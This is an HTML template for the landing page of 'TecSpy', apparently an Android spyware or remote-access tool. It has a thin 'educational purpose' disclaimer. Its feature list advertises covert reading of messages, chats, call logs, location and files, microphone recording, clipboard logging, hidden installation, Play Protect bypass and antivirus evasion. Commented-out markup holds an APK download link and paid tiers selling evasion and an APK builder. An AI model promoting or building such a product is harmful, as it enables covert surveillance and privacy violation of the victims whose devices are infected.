
<!DOCTYPE html>
<html lang="en">

    <% include partials/head.ejs %>


    <body>
        <header id="s-header">
            <nav class="navbar navbar-expand-lg">
                <div class="container px-0">
                    <a class="navbar-brand" href="/">
                    <img src="/img/logo.png" alt="Logotype">
                  </a>
                  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
                    <span class="navbar-toggler-icon"></span>
                  </button>
    
                  <div class="collapse navbar-collapse" id="navbarSupportedContent">
                    <ul class="navbar-nav ml-auto">
                      <li class="nav-item">
                        <a class="nav-link" href="#s-header">Home</a>
                      </li>
                      <li class="nav-item">
                        <a class="nav-link" href="#s-services">Features</a>
                      </li>
<!--                       <li class="nav-item">
                        <a class="nav-link" href="#s-pricing-anchor">Pricing</a>
                      </li> -->
                      <li class="nav-item">
                        <a class="nav-link" href="https://links.collect.chat/5f5dec49cc65116bf72a9da5">Contact</a>
                      </li>
                    </ul>
                  </div>
                </div>
            </nav>
            <div class="container">		
                <div id="main-text">
                    <div class="row">
                        <div class="col-xl-6 col-lg-8">
                            <h1>DISCLAIMER</h1>
                            <p>TecSpy Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool. TecSpy is built for Educational Purpose. Use at your own Risk. </p>
<!--                         <p><b>Please Download Our Clint App To Use The Demo</b></p> -->
                          <div class="row button_wrap">
<!--                                 <div class="col-6">
                                    <a class="btn-custom"download="TecSpy.apk" href="http://tecarticle.com/.app/TecSpy(WithAdmin).apk">
                                      <i class="download icon"></i>Download</a>
                                </div> -->
                                <div class="col-6">
                                    <a href="/login" class="btn-custom">Login</a>
                                </div>
                            </div>				
                        </div>
                        <div class="img_wrap">
                            <img src="/img/hacker.png" alt="">
                        </div>
                    </div>			
                </div>
            </div>	
            <a href="#s-services" class="scroll-down flowing-scroll"><img src="/img/scroll-down.png" alt="scroll down">Scroll Down</a>
        </header>
        <section id="s-services" class="section">
            <div class="container">
                <h2 class="h2">Features</h2>
                <div class="row">
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>View Call Logs</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>View Messages</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>View Contacts</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Get Location of Device</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>File Explorer & Downloader</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Microphone Recording</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>View WiFi Networks</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Live Clipboad Logging</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>View Installed Apps</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Monitor Skype/Telegram</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>App auto-hide</p>
                        </div>
                    </div>
                    <!-- <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Dedicated UI</p>
                        </div>
                    </div> -->
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Whatsapp Chats</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Instagram Chats</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Messenger Chats</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Tinder Chats</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Bypass PlayProtect</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Undetectable by AntiVirus</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Command Queing</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Inbuilt Apk Builder</p>
                        </div>
                    </div>
                    <div class="col-6 col-md-3">
                        <div class="wrap-services">
                            <p>Many more Features!</p>
                        </div>
                    </div>
                </div>
            </div>		
        </section>
        <section id="s-video">
            <div class="container" id="PCA">
                <div class="row justify-content-between align-items-center h-100">
                    <div class="col-md-6">
                        <p class="PCA-text">Made By &#10084;&#65039; BM Shifat</p>
                    </div>
                    <div class="col-md-4">
                        <a href="https://bmshifat.alnk.host/" class="PCA-button btn-custom">Official Website</a>
                    </div>
                </div>
            </div>
        </section>
        <section id="s-pricing">
            <div class="anchor-block" id="s-pricing-anchor"></div>
<!--             <div class="container">
                <h2 class="h2">premium&nbsp;&nbsp; features</h2>
                <section class="pricing py-5">
                    <div class="container">
                      <div class="row">
                      
                        
                        <div class="col-lg-4">
                          <div class="card mb-5 mb-lg-0">
                            <div class="card-body">
                              <h5 class="card-title text-muted text-uppercase text-center">Pro</h5>
                              <h6 id="sss" class="card-price text-center">$10</h6>
                              <hr>
                              <ul class="fa-ul">
                                <li class="text-muted">✖️ &nbsp;&nbsp;Decoded Code</li>
                                <li class="text-muted">✖️ &nbsp;&nbsp;Inbuilt Apk Builder</li>
                                <li class="text-muted">✔️ &nbsp;&nbsp;Bypass PlayProtect</li>
                                <li class="text-muted">✖️ &nbsp;&nbsp;Undetectable by AntiVirus</li>
                              </ul>
                              <a href="https://links.collect.chat/5f5de311cc65116bf72a9d93" class="btn btn-block btn-primary text-uppercase">Button</a>
                            </div>
                          </div>
                        </div>
              
                        
                        <div class="col-lg-4">
                          <div class="card mb-5 mb-lg-0">
                            <div class="card-body">
                              <h5 class="card-title text-muted text-uppercase text-center">Plus</h5>
                              <h6 id="sss" class="card-price text-center">$30</h6>
                              <hr>
                              <ul class="fa-ul">
                                <li class="text-muted">✖️ &nbsp;&nbsp;Decoded Code</li>
                                <li class="text-muted">✔️ &nbsp;&nbsp;Inbuilt Apk Builder</li>
                                <li class="text-muted">✔️ &nbsp;&nbsp;Bypass PlayProtect</li>
                                <li class="text-muted">✖️ &nbsp;&nbsp;Undetectable by AntiVirus</li>
                              </ul>
                              <a href="https://links.collect.chat/5f5de311cc65116bf72a9d93" class="btn btn-block btn-primary text-uppercase">Button</a>
                            </div>
                          </div>
                        </div>
            
                        
                        <div class="col-lg-4">
                          <div class="card">
                            <div class="card-body">
                              <h5 class="card-title text-muted text-uppercase text-center">Ultra</h5>
                              <h6 id="sss" class="card-price text-center">$100</h6>
                              <hr>
                              <ul class="fa-ul">
                                <li class="text-muted">✔️ &nbsp;&nbsp;Decoded Code</li>
                                <li class="text-muted">✔️ &nbsp;&nbsp;Inbuilt Apk Builder</li>
                                <li class="text-muted">✔️ &nbsp;&nbsp;Bypass PlayProtect</li>
                                <li class="text-muted">✔️ &nbsp;&nbsp;Undetectable by AntiVirus</li>
                              </ul>
                              <a href="https://links.collect.chat/5f5de311cc65116bf72a9d93" class="btn btn-block btn-primary text-uppercase">Button</a>
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                  </section>
            </div> -->
        </section>
    
        <footer id="s-footer">
            <a href="javascript:LoginFunc('download');" class="scroll-top"><img src="/img/svg/downloadmain.svg" alt="Download"></a>
            <div style="text-align: center; color: azure; background-color: black;">              
            CopyRight &copy; <script type="text/javascript"> document.write( new Date().getFullYear()); </script>           
            </div>
        </footer>  
    </body>
    </html>
    
    